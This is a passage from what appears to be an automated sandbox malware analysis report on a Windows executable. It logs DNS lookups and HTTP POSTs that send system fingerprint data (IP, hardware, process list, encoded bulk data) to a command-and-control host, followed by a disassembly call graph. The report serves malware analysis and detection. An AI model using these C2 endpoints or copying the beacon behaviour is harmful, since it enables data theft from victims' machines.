                                                            Dec 27, 2024 14:53:26.684243917 CET1.1.1.1192.168.2.40xe998No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
                                                            Dec 27, 2024 14:53:28.504065037 CET1.1.1.1192.168.2.40x51d6No error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • httpbin.org
                                                            • home.fiveth5ht.top

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.4497315.101.3.217807292C:\Users\user\Desktop\BkB1ur7aFW.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 27, 2024 14:53:22.495835066 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                            Host: home.fiveth5ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 444891
                                                            Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 31 33 36 32 30 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                            Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317136206", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
                                                            Dec 27, 2024 14:53:22.615530968 CET2472OUTData Raw: 31 4d 4e 69 66 47 71 64 43 76 54 64 70 30 36 6e 68 6e 34 76 78 6b 75 71 61 76 77 42 61 55 5a 4c 33 6f 7a 69 33 47 55 57 70 52 62 69 30 33 5c 2f 41 47 76 44 39 6e 58 39 4d 61 70 54 6a 56 70 2b 44 38 5a 30 35 4b 36 6c 48 78 44 38 4b 35 4a 5c 2f 64
                                                            Data Ascii: 1MNifGqdCvTdp06nhn4vxkuqavwBaUZL3ozi3GUWpRbi03\/AGvD9nX9MapTjVp+D8Z05K6lHxD8K5J\/dxxdNbNNJxd00mj8h6K\/Zm2\/4JKC4\/5uB2f90p3f+9JX\/OPWvyi+JHhA\/D34h+PfALagNWPgfxp4p8IHVRamxGpnw1rl9op1AWRuLs2YvTZfaRam7uvs\/meV9om2eY37R4K\/Su8AfpEZlnWT+DvHv+uGY8O
                                                            Dec 27, 2024 14:53:22.615570068 CET2472OUTData Raw: 55 2b 76 79 5c 2f 55 72 48 5a 35 6a 75 50 2b 32 63 6b 59 35 39 5c 2f 77 44 50 30 2b 6c 4e 69 33 79 65 54 5c 2f 41 6e 5c 2f 54 50 6a 5c 2f 4f 66 38 38 56 4b 32 5a 4e 36 66 2b 51 5c 2f 38 66 72 5c 2f 6e 69 6f 63 66 77 66 78 2b 56 35 55 76 37 72 5c
                                                            Data Ascii: U+vy\/UrHZ5juP+2ckY59\/wDP0+lNi3yeT\/An\/TPj\/Of88VK2ZN6f+Q\/8fr\/niocfwfx+V5Uv7r\/l3\/z09MV0GhD5m7\/bEkX737R\/n\/D2oWOfbvHz+Z+6lH\/Lf\/PHb+dPk2EIn8ccvPl\/l6f5\/GnyZ2u7\/I\/\/AEzi\/wAfx96DoKbR87N8f1\/z+nXtULF5NiZ\/Hyv8P8\/Wrk0f7zZzs8rzf8cdP61T
                                                            Dec 27, 2024 14:53:22.615638971 CET2472OUTData Raw: 2f 41 45 79 35 4d 39 6a 65 32 7a 54 36 68 63 67 51 33 56 73 38 44 73 6b 75 59 6d 4f 39 33 39 39 31 37 34 58 66 44 54 78 4e 35 6b 6c 39 34 57 58 52 4c 36 54 65 37 61 6c 34 4d 75 6c 38 50 74 4a 4d 33 45 66 6e 61 4e 4c 62 61 6c 34 59 53 31 69 36 6d
                                                            Data Ascii: /AEy5M9je2zT6hcgQ3Vs8DskuYmO9399174XfDTxN5kl94WXRL6Te7al4Mul8PtJM3EfnaNLbal4YS1i6m10nRNGll6G8QndXwb+xt4607wh4M+Mmoa0bj+yfC0Gi+K7wWyRyTJYLa6xFqlxEkskEbNbQafbyvGZxLMg220cko2P5z4o+N37SMurfEH9oP4XeP9N174CWM1pbaf4e1Pw9CV0+\/t7vQtNk8M6hocsUutaZewWuo
                                                            Dec 27, 2024 14:53:22.615689039 CET2472OUTData Raw: 33 39 4c 50 6a 54 34 69 65 44 5c 2f 69 31 72 48 37 41 50 78 4a 2b 48 2b 74 57 76 69 4c 77 5a 34 30 2b 50 32 75 2b 49 50 44 32 73 57 6d 34 52 33 64 68 66 66 73 61 66 74 5a 4f 67 6b 69 6b 43 7a 57 6c 35 62 53 65 5a 61 61 68 59 58 4b 52 58 6d 6e 33
                                                            Data Ascii: 39LPjT4ieD\/i1rH7APxJ+H+tWviLwZ40+P2u+IPD2sWm4R3dhffsaftZOgkikCzWl5bSeZaahYXKRXmn38FzY3kMN1bzRJ\/O7\/wAFYMt+3J8Vcc7dG+GS\/T\/i2fhNv\/Zq\/YvotYWngfGzhz2WVxyPEY3gjij+1MtpTzJRp4zB53muXVKdWlmeMxmLpTgsswyrUKtZxp4ik5KnTlov51+mlip476PfE\/tczee0MFx\/w
                                                            Dec 27, 2024 14:53:22.615813017 CET2472OUTData Raw: 66 58 79 5c 2f 38 41 6e 72 35 63 6b 33 2b 71 5c 2f 77 43 6e 58 5c 2f 50 72 36 55 65 58 2b 37 6d 54 39 34 69 54 78 66 75 38 66 6c 5c 2f 2b 76 5c 2f 38 41 58 55 32 33 7a 46 4c 37 4e 38 4d 6e 2b 71 39 50 5c 2f 41 54 33 36 65 76 70 56 58 63 6d 33 2b
                                                            Data Ascii: fXy\/8Anr5ck3+q\/wCnX\/Pr6UeX+7mT94iTxfu8fl\/+v\/8AXU23zFL7N8Mn+q9P\/AT36evpVXcm3+DZH+98v\/P\/ANb6evL7Pz\/D\/gnQK8m2SZH+R\/KHm+Z\/n\/8AXx9Khj3rb7H\/AOWZuPN4Ofr3\/wA\/lVzdlXT\/AFP\/AC1\/d5\/\/AFf549Kpyfu5HRxcQP8A6RFL5fPp\/wDWrQ0p9fl+oeW7SP8ALv8
                                                            Dec 27, 2024 14:53:22.615830898 CET2472OUTData Raw: 59 6a 43 4f 4e 50 44 77 65 4b 6f 34 69 6e 48 45 4a 75 74 45 5c 2f 4e 54 39 69 6e 34 6d 66 45 33 34 6a 65 43 5c 2f 6a 43 50 45 75 6a 36 52 70 33 77 35 30 43 39 57 77 2b 48 41 30 66 52 64 49 38 50 32 65 6d 4c 4d 6d 72 58 32 72 2b 48 59 37 48 53 4c
                                                            Data Ascii: YjCONPDweKo4inHEJutE\/NT9in4mfE34jeC\/jCPEuj6Rp3w50C9Ww+HA0fRdI8P2emLMmrX2r+HY7HSLGzguGsba50W7uZ2GYLm+dVaRLhVg6Kv0p8S6PpSeG9bji0+0t1ayvZSLaCO2JllRmkkJgWMs8jfM7Nku3L5Nfn7caEhy8ExXuVmGV\/wC+1AKge6t7mv5PzzxO4f4szzG5pRyhcL0MVOn7PL6T+s4ak4UKNKU3XpQ
                                                            Dec 27, 2024 14:53:22.615925074 CET2472OUTData Raw: 52 34 6e 4b 36 57 46 78 5c 2f 39 70 55 63 4c 6b 54 77 65 56 34 54 41 34 4f 47 4a 64 36 6e 4a 68 61 32 45 78 64 47 68 53 71 7a 71 54 6f 34 65 4e 47 6e 47 66 73 6c 54 6a 48 38 37 47 58 50 49 36 31 46 56 69 69 76 37 39 50 38 41 4c 41 72 30 56 4a 4a
                                                            Data Ascii: R4nK6WFx\/9pUcLkTweV4TA4OGJd6nJha2ExdGhSqzqTo4eNGnGfslTjH87GXPI61FViiv79P8ALAr0VJJ2\/H+lRfxp9TQaU+vyGeX7\/p\/9ejy\/f9P\/AK9SUUD515\/18yvSFd3r+FSydvx\/pUdBYzYPf\/P4U3Yfb\/P4VLRQBXoqSTt+NR0HQFV6sVE\/X8P6mgBlR+X7\/p\/9epKKDoK9FSSdvx\/pUdADNg9\/8\
                                                            Dec 27, 2024 14:53:22.615957975 CET2472OUTData Raw: 38 59 5c 2f 6c 5c 2f 6e 76 2b 58 4c 50 4d 50 33 45 54 66 38 41 75 76 36 66 6a 5c 2f 70 32 4f 32 4f 34 48 30 6d 56 66 6d 32 44 4b 50 38 41 35 5c 2f 30 58 36 30 53 5a 5a 5a 6e 5c 2f 41 48 65 66 4b 38 72 6e 5c 2f 72 36 5c 2f 79 65 6c 42 30 46 61 54
                                                            Data Ascii: 8Y\/l\/nv+XLPMP3ETf8Auv6fj\/p2O2O4H0mVfm2DKP8A5\/0X60SZZZn\/AHefK8rn\/r6\/yelB0FaTmNn2FPM4H9D+FHyfJsh2R\/6R\/wA\/X9P8\/lT\/APlo6T\/J6R5\/1v8AnFQ+Y\/8AElz\/AK3zf9b+4\/z9K29\/+7+IDMJ8\/wA8n\/PKXzOmP8\/570\/7vyfu\/L\/1RxL7f59sGhZDHvbYHf8A1X\/6\/w
                                                            Dec 27, 2024 14:53:22.616132021 CET2472OUTData Raw: 38 36 32 47 77 75 4a 71 4c 36 78 6d 64 53 45 34 55 61 74 35 4e 78 61 50 52 70 4a 6f 4a 76 6d 6d 56 46 6c 78 67 6b 6b 73 65 4d 34 47 54 6b 34 48 70 32 35 78 7a 55 4a 74 62 64 5c 2f 38 41 56 54 34 39 6e 78 78 5c 2f 6a 57 76 34 52 30 50 52 5c 2f 46
                                                            Data Ascii: 862GwuJqL6xmdSE4Uat5NxaPRpJoJvmmVFlxgkkseM4GTk4Hp25xzUJtbd\/8AVT49nxx\/jWv4R0PR\/Ftl4Qnm+K\/wd8D6t8S\/jnqH7OHwp8JePdU+KVr4l+JnxgsdF8D61F4V8Oz+CvhB478G6L\/aa\/EXwppunat4\/wDGPgvRm1PUdl5qFnYwy36+LeHvit4G8Q2ukzWni\/wi9\/ewap\/bfh5NT1e317wXqmlavf6
                                                            Dec 27, 2024 14:53:22.616163969 CET2472OUTData Raw: 34 61 79 79 76 6d 32 62 59 6d 6c 69 71 39 4c 42 34 64 30 34 7a 2b 72 34 44 43 31 73 64 6a 73 54 55 71 56 71 6c 4b 6a 51 77 75 43 77 57 48 78 47 4d 78 6d 4a 72 31 4b 64 44 43 34 57 68 57 78 46 65 70 54 6f 30 70 7a 6a 6e 31 39 73 66 73 6c 66 74 79
                                                            Data Ascii: 4ayyvm2bYmliq9LB4d04z+r4DC1sdjsTUqVqlKjQwuCwWHxGMxmJr1KdDC4WhWxFepTo0pzjn19sfslfty\/ET9j7TfHGneA\/CPgnxMvj2+0G91aTxjFr8\/2U+HINVgsE05ND1vRDH5g1q9a7a6kuxLttRClv5UpuPjfw\/D4Wu9B8M+IPHvxk+BvwTtvHms65pfw5t\/ih4r8d3Fx8QtO8N+ILjwlrHjXw+\/wp+FnxStNG+
                                                            Dec 27, 2024 14:53:26.475286961 CET157INHTTP/1.1 200 OK
                                                            Server: nginx/1.22.1
                                                            Date: Fri, 27 Dec 2024 13:53:26 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 1
                                                            Connection: close
                                                            Data Raw: 30
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.4497325.101.3.217807292C:\Users\user\Desktop\BkB1ur7aFW.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 27, 2024 14:53:26.805668116 CET98OUTGET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                                            Host: home.fiveth5ht.top
                                                            Accept: */*
                                                            Dec 27, 2024 14:53:28.288899899 CET372INHTTP/1.1 404 NOT FOUND
                                                            Server: nginx/1.22.1
                                                            Date: Fri, 27 Dec 2024 13:53:28 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 207
                                                            Connection: close
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.4497335.101.3.217807292C:\Users\user\Desktop\BkB1ur7aFW.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 27, 2024 14:53:28.625020027 CET171OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                            Host: home.fiveth5ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                            Data Ascii: { "id1": "0", "data": "Done1" }
                                                            Dec 27, 2024 14:53:30.142879963 CET372INHTTP/1.1 404 NOT FOUND
                                                            Server: nginx/1.22.1
                                                            Date: Fri, 27 Dec 2024 13:53:29 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Content-Length: 207
                                                            Connection: close
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                                            Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.44973034.226.108.1554437292C:\Users\user\Desktop\BkB1ur7aFW.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-27 13:53:18 UTC52OUTGET /ip HTTP/1.1
                                                            Host: httpbin.org
                                                            Accept: */*
                                                            2024-12-27 13:53:19 UTC224INHTTP/1.1 200 OK
                                                            Date: Fri, 27 Dec 2024 13:53:18 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Connection: close
                                                            Server: gunicorn/19.9.0
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: true
                                                            2024-12-27 13:53:19 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                            Data Ascii: { "origin": "8.46.123.189"}


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:08:53:13
                                                            Start date:27/12/2024
                                                            Path:C:\Users\user\Desktop\BkB1ur7aFW.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\BkB1ur7aFW.exe"
                                                            Imagebase:0x3f0000
                                                            File size:4'426'752 bytes
                                                            MD5 hash:5FAD6C65B553CA73463694390E2F9301
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:5.2%
                                                              Dynamic/Decrypted Code Coverage:46.8%
                                                              Signature Coverage:8.6%
                                                              Total number of Nodes:545
                                                              Total number of Limit Nodes:52
                                                              execution_graph 65086 3f29ff FindFirstFileA 65087 3f2a31 65086->65087 65088 3f2a5c RegOpenKeyExA 65087->65088 65089 3f2a93 65088->65089 65090 3f2ade CharUpperA 65089->65090 65092 3f2b0a 65090->65092 65091 3f2bf9 QueryFullProcessImageNameA 65093 3f2c3b CloseHandle 65091->65093 65092->65091 65094 3f2c64 65093->65094 65095 3f2df1 CloseHandle 65094->65095 65096 3f2e23 65095->65096 65250 40d5e0 65251 40d652 WSAStartup 65250->65251 65252 40d5f0 65250->65252 65251->65252 65253 3f3d5e 65254 3f3d30 65253->65254 65254->65253 65255 3f3d90 65254->65255 65259 400ab0 65254->65259 65262 3ffcb0 7 API calls 65255->65262 65258 3f3dc1 65263 4005b0 65259->65263 65261 400acd 65261->65254 65262->65258 65264 4005bd 65263->65264 65267 4007c7 65263->65267 65265 400707 WSAEventSelect 65264->65265 65266 4007ef 65264->65266 65264->65267 65269 3f76a0 send 65264->65269 65265->65264 65265->65267 65266->65267 65268 406fa0 select 65266->65268 65272 400847 65266->65272 65267->65261 65268->65272 65269->65264 65270 4009e8 WSAEnumNetworkEvents 65271 4009d0 WSAEventSelect 65270->65271 65270->65272 65271->65270 65271->65272 65272->65267 65272->65270 65272->65271 65097 42b400 65098 42b425 65097->65098 65099 42b40b 65097->65099 65102 3f7770 65099->65102 65100 42b421 65103 3f77b6 recv 65102->65103 65104 3f7790 65102->65104 65105 3f7799 65103->65105 65104->65103 65104->65105 65105->65100 65106 42e400 65107 42e459 65106->65107 65109 42e412 65106->65109 65110 4268b0 socket ioctlsocket connect getsockname closesocket 65109->65110 65110->65107 65111 42b3c0 65112 42b3cb 65111->65112 65113 42b3ee 65111->65113 65117 429290 65112->65117 65124 3f76a0 65112->65124 65114 42b3ea 65118 3f76a0 send 65117->65118 65120 4292e5 65118->65120 65119 429392 65119->65114 65120->65119 65121 429335 WSAIoctl 65120->65121 65121->65119 65122 429366 65121->65122 65122->65119 65123 429371 setsockopt 65122->65123 65123->65119 65125 3f76e6 send 65124->65125 65126 3f76c0 65124->65126 65127 3f76c9 65125->65127 65126->65125 65126->65127 65127->65114 65273 3f255d 65328 779f70 65273->65328 65275 3f256c GetSystemInfo 65276 3f2589 65275->65276 65277 3f25a0 GlobalMemoryStatusEx 65276->65277 65278 3f25ec 65277->65278 65330 713040a 65278->65330 65336 71300ec 65278->65336 65344 71303ec 65278->65344 65352 71301ee 65278->65352 65360 713036f 65278->65360 65368 71300aa 65278->65368 65376 713032a 65278->65376 65384 7130226 65278->65384 65392 7130466 65278->65392 65397 7130261 65278->65397 65405 7130321 65278->65405 65413 71303a3 65278->65413 65421 713017d 65278->65421 65429 71301fa 65278->65429 65437 713013a 65278->65437 65445 71301bb 65278->65445 65453 71302b2 65278->65453 65461 71302cd 65278->65461 65469 71304cd 65278->65469 65473 7130009 65278->65473 65481 713030a 65278->65481 65489 7130518 65278->65489 65493 713038b 65278->65493 65501 71300c4 65278->65501 65509 7130046 65278->65509 65517 7130446 65278->65517 65523 7130080 65278->65523 65531 7130000 65278->65531 65539 7130501 65278->65539 65542 7130342 65278->65542 65550 713011f 65278->65550 65558 713001b 65278->65558 65566 713005a 65278->65566 65574 713015a 65278->65574 65582 713029a 65278->65582 65590 713049a 65278->65590 65594 71300d1 65278->65594 65602 7130454 65278->65602 65608 7130215 65278->65608 65616 7130492 65278->65616 65329 779f7d 65328->65329 65329->65275 65329->65329 65331 713045d 65330->65331 65332 7130492 GetLogicalDrives 65331->65332 65333 713047f GetLogicalDrives 65332->65333 65335 7130528 65333->65335 65337 7130102 65336->65337 65338 7130446 2 API calls 65337->65338 65339 713043a 65337->65339 65338->65337 65340 7130492 GetLogicalDrives 65339->65340 65341 713047f GetLogicalDrives 65340->65341 65343 7130528 65341->65343 65345 71303ad 65344->65345 65346 7130446 2 API calls 65345->65346 65347 713043a 65345->65347 65346->65345 65348 7130492 GetLogicalDrives 65347->65348 65349 713047f GetLogicalDrives 65348->65349 65351 7130528 65349->65351 65353 7130203 65352->65353 65354 7130446 2 API calls 65353->65354 65355 713043a 65353->65355 65354->65353 65356 7130492 GetLogicalDrives 65355->65356 65357 713047f GetLogicalDrives 65356->65357 65359 7130528 65357->65359 65361 713037e 65360->65361 65362 7130446 2 API calls 65361->65362 65363 713043a 65361->65363 65362->65361 65364 7130492 GetLogicalDrives 65363->65364 65365 713047f GetLogicalDrives 65364->65365 65367 7130528 65365->65367 65369 7130092 65368->65369 65370 7130446 2 API calls 65369->65370 65371 713043a 65369->65371 65370->65369 65372 7130492 GetLogicalDrives 65371->65372 65373 713047f GetLogicalDrives 65372->65373 65375 7130528 65373->65375 65377 7130335 65376->65377 65378 7130446 2 API calls 65377->65378 65379 713043a 65377->65379 65378->65377 65380 7130492 GetLogicalDrives 65379->65380 65381 713047f GetLogicalDrives 65380->65381 65383 7130528 65381->65383 65385 713024c 65384->65385 65386 7130446 2 API calls 65385->65386 65387 713043a 65385->65387 65386->65385 65388 7130492 GetLogicalDrives 65387->65388 65389 713047f GetLogicalDrives 65388->65389 65391 7130528 65389->65391 65393 7130492 GetLogicalDrives 65392->65393 65394 713047f GetLogicalDrives 65392->65394 65393->65394 65396 7130528 65394->65396 65398 7130275 65397->65398 65399 7130446 2 API calls 65398->65399 65400 713043a 65398->65400 65399->65398 65401 7130492 GetLogicalDrives 65400->65401 65402 713047f GetLogicalDrives 65401->65402 65404 7130528 65402->65404 65406 713032e 65405->65406 65407 7130446 2 API calls 65406->65407 65408 713043a 65406->65408 65407->65406 65409 7130492 GetLogicalDrives 65408->65409 65410 713047f GetLogicalDrives 65409->65410 65412 7130528 65410->65412 65414 7130340 65413->65414 65415 7130446 2 API calls 65414->65415 65416 713043a 65414->65416 65415->65414 65417 7130492 GetLogicalDrives 65416->65417 65418 713047f GetLogicalDrives 65417->65418 65420 7130528 65418->65420 65422 71300eb 65421->65422 65423 7130446 2 API calls 65422->65423 65424 713043a 65422->65424 65423->65422 65425 7130492 GetLogicalDrives 65424->65425 65426 713047f GetLogicalDrives 65425->65426 65428 7130528 65426->65428 65430 713021d 65429->65430 65431 7130446 2 API calls 65430->65431 65432 713043a 65430->65432 65431->65430 65433 7130492 GetLogicalDrives 65432->65433 65434 713047f GetLogicalDrives 65433->65434 65436 7130528 65434->65436 65438 71300eb 65437->65438 65439 7130446 2 API calls 65438->65439 65440 713043a 65438->65440 65439->65438 65441 7130492 GetLogicalDrives 65440->65441 65442 713047f GetLogicalDrives 65441->65442 65444 7130528 65442->65444 65446 71301eb 65445->65446 65447 7130446 2 API calls 65446->65447 65448 713043a 65446->65448 65447->65446 65449 7130492 GetLogicalDrives 65448->65449 65450 713047f GetLogicalDrives 65449->65450 65452 7130528 65450->65452 65454 713027e 65453->65454 65455 7130446 2 API calls 65454->65455 65456 713043a 65454->65456 65455->65454 65457 7130492 GetLogicalDrives 65456->65457 65458 713047f GetLogicalDrives 65457->65458 65460 7130528 65458->65460 65463 71302d7 65461->65463 65462 7130446 2 API calls 65462->65463 65463->65462 65464 713043a 65463->65464 65465 7130492 GetLogicalDrives 65464->65465 65466 713047f GetLogicalDrives 65465->65466 65468 7130528 65466->65468 65470 7130487 GetLogicalDrives 65469->65470 65472 7130528 65470->65472 65474 7130013 65473->65474 65475 7130446 2 API calls 65474->65475 65476 713043a 65474->65476 65475->65474 65477 7130492 GetLogicalDrives 65476->65477 65478 713047f GetLogicalDrives 65477->65478 65480 7130528 65478->65480 65482 7130335 65481->65482 65483 7130446 2 API calls 65482->65483 65484 713043a 65482->65484 65483->65482 65485 7130492 GetLogicalDrives 65484->65485 65486 713047f GetLogicalDrives 65485->65486 65488 7130528 65486->65488 65490 7130487 GetLogicalDrives 65489->65490 65491 713051b 65489->65491 65490->65491 65494 713038f 65493->65494 65495 7130446 2 API calls 65494->65495 65496 713043a 65494->65496 65495->65494 65497 7130492 GetLogicalDrives 65496->65497 65498 713047f GetLogicalDrives 65497->65498 65500 7130528 65498->65500 65502 71300d7 65501->65502 65503 7130446 2 API calls 65502->65503 65504 713043a 65502->65504 65503->65502 65505 7130492 GetLogicalDrives 65504->65505 65506 713047f GetLogicalDrives 65505->65506 65508 7130528 65506->65508 65510 713004f 65509->65510 65511 7130446 2 API calls 65510->65511 65512 713043a 65510->65512 65511->65510 65513 7130492 GetLogicalDrives 65512->65513 65514 713047f GetLogicalDrives 65513->65514 65516 7130528 65514->65516 65518 713045d 65517->65518 65519 7130492 GetLogicalDrives 65518->65519 65520 713047f GetLogicalDrives 65519->65520 65522 7130528 65520->65522 65524 7130092 65523->65524 65525 7130446 2 API calls 65524->65525 65526 713043a 65524->65526 65525->65524 65527 7130492 GetLogicalDrives 65526->65527 65528 713047f GetLogicalDrives 65527->65528 65530 7130528 65528->65530 65532 7130013 65531->65532 65533 7130446 2 API calls 65532->65533 65534 713043a 65532->65534 65533->65532 65535 7130492 GetLogicalDrives 65534->65535 65536 713047f GetLogicalDrives 65535->65536 65538 7130528 65536->65538 65540 713050a GetLogicalDrives 65539->65540 65541 7130528 65540->65541 65543 713037e 65542->65543 65544 7130446 2 API calls 65543->65544 65545 713043a 65543->65545 65544->65543 65546 7130492 GetLogicalDrives 65545->65546 65547 713047f GetLogicalDrives 65546->65547 65549 7130528 65547->65549 65551 713012d 65550->65551 65552 7130446 2 API calls 65551->65552 65553 713043a 65551->65553 65552->65551 65554 7130492 GetLogicalDrives 65553->65554 65555 713047f GetLogicalDrives 65554->65555 65557 7130528 65555->65557 65559 713001e 65558->65559 65560 7130446 2 API calls 65559->65560 65561 713043a 65559->65561 65560->65559 65562 7130492 GetLogicalDrives 65561->65562 65563 713047f GetLogicalDrives 65562->65563 65565 7130528 65563->65565 65567 713001b 65566->65567 65568 7130446 2 API calls 65567->65568 65569 713043a 65567->65569 65568->65567 65570 7130492 GetLogicalDrives 65569->65570 65571 713047f GetLogicalDrives 65570->65571 65573 7130528 65571->65573 65575 7130102 65574->65575 65576 7130446 2 API calls 65575->65576 65577 713043a 65575->65577 65576->65575 65578 7130492 GetLogicalDrives 65577->65578 65579 713047f GetLogicalDrives 65578->65579 65581 7130528 65579->65581 65583 71302c3 65582->65583 65584 7130446 2 API calls 65583->65584 65585 713043a 65583->65585 65584->65583 65586 7130492 GetLogicalDrives 65585->65586 65587 713047f GetLogicalDrives 65586->65587 65589 7130528 65587->65589 65591 71304b1 GetLogicalDrives 65590->65591 65592 7130528 65590->65592 65591->65592 65595 71300d7 65594->65595 65596 7130446 2 API calls 65595->65596 65597 713043a 65595->65597 65596->65595 65598 7130492 GetLogicalDrives 65597->65598 65599 713047f GetLogicalDrives 65598->65599 65601 7130528 65599->65601 65603 713046f 65602->65603 65604 7130492 